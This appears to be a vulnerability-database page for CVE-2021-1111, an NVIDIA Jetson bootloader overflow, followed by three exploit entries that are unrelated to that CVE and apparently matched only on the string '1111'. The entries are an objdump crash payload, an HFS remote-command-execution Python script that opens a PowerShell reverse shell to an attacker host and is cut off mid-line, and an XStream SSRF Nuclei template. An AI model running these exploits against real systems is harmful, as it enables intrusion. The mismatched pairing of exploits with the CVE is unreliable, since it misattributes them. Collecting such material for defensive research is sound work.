CVE-2021-1111
published 2021-08-11CVE-2021-1111: Bootloader contains a vulnerability in the NV3P server where any user with physical access through USB can trigger an incorrect bounds check, which may lead to…
PriorityP423medium6.7CVSS 3.1
AVPACLPRNUINSCCLILAH
EPSS
0.28%
20.1th percentile
Bootloader contains a vulnerability in the NV3P server where any user with physical access through USB can trigger an incorrect bounds check, which may lead to buffer overflow, resulting in limited information disclosure, limited data integrity, and denial of service across all components.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nvidia | jetson_linux | >= 32.1 < 32.6.1 | 32.6.1 |
CVSS provenance
nvdv3.16.7MEDIUMCVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
nvdv2.04.6MEDIUMAV:L/AC:L/Au:N/C:P/I:P/A:P
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
binutils 2.37 - Objdump Segmentation Fault
exploitdb·2022-04-07
CVE-2021-43149 binutils 2.37 - Objdump Segmentation Fault
binutils 2.37 - Objdump Segmentation Fault
---
# Exploit Title: binutils 2.37 - Objdump Segmentation Fault
# Date: 2021-11-03
# Exploit Author: p3tryx
# Vendor Homepage: https://www.gnu.org/software/binutils/
# Version: binutils 2.37
# Tested on: Ubuntu 18.04
# CVE : CVE-2021-43149
Payload file
```
%223"\972\00\0083=Q333A11111111411111333311111111111d\00\00\00111111111111111111
111111111111111111111111111111111111111111111111111*111111111111111111111111.1111111111111111111111111111111;111011111111111111111111111111111111111111111111111111\EA111111111111111
$%22622FF7FFF111111111111111111111111111111111111111111111111111111111111111111111111111111111111.1111111111111111111111$1
1111
$%22622FFFFFFF1111111111111111111111111111\BF\BF\BF\BF\BF\BF11111111111111111111111111111111111111111111
Exploit-DB
HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
exploitdb·2021-02-23·CVSS 9.8
CVE-2014-6287 [CRITICAL] HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
---
# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 20/02/2021
# Exploit Author: Pergyz
# Vendor Homepage: http://www.rejetto.com/hfs/
# Software Link: https://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Microsoft Windows Server 2012 R2 Standard
# CVE : CVE-2014-6287
# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands
#!/usr/bin/python3
import base64
import os
import urllib.request
import urllib.parse
lhost = "10.10.10.1"
lport = 1111
rhost = "10.10.10.8"
rport = 80
# Define the command to be written to a file
command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $clien
Nuclei
XStream <1.4.18 - Server-Side Request Forgery
nuclei·CVSS 8.5
CVE-2021-39152 [HIGH] XStream <1.4.18 - Server-Side Request Forgery
XStream
http://{{interactsh-url}}/internal/
GBK
1111
b
0
0
http://{{interactsh-url}}/internal/
1111
b
0
0
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: Java"
# digest: 4b0a0048304602210085f5a9aa293ef25789b279f09bf0191d0239ee9969b87044a9c1747eb8a2cb37022100c68c2d6b0737127e9a21dc6b83e911a87d72539cdc1f9923b07d05333f4a52ab:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
2021-08-11
Published